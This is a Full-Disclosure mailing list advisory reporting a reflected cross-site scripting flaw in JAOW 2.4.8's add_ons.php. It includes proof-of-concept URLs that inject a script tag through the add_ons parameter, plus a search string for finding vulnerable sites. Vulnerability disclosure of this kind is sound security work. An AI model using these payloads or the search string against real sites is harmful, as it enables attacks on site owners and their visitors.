[Full-disclosure] JAOW 2.4.8 XSS Vulnerability

["metropolis haxor" <metrOpolis@xxxxxxxxxxxxx>]

Hi guys,
You can find the software affected at http://www.jaow.net/uploads/jaow_2.4.8.zip
Thanks,

Metropolis

###########################################
#
# Script Name : JAOW 2.4.8
#
# Version : 2.4.8
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 23/03/2013
#
# Download app : http://www.jaow.net/uploads/jaow_2.4.8.zip
#
# Google search :  Propuls� par Jaow 2.4.8 - 
#
###########################################
 
PoC :
 
http://[target]/[path]/add_ons.php?add_ons=[Xss]
 
Example :
 
http://[target]/[path]/add_ons.php?add_ons=1";><script>alert(31337);</script>
 
local Example :
 
http://localhost/demo/add_ons.php?add_ons=1";><script>alert(31337);</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/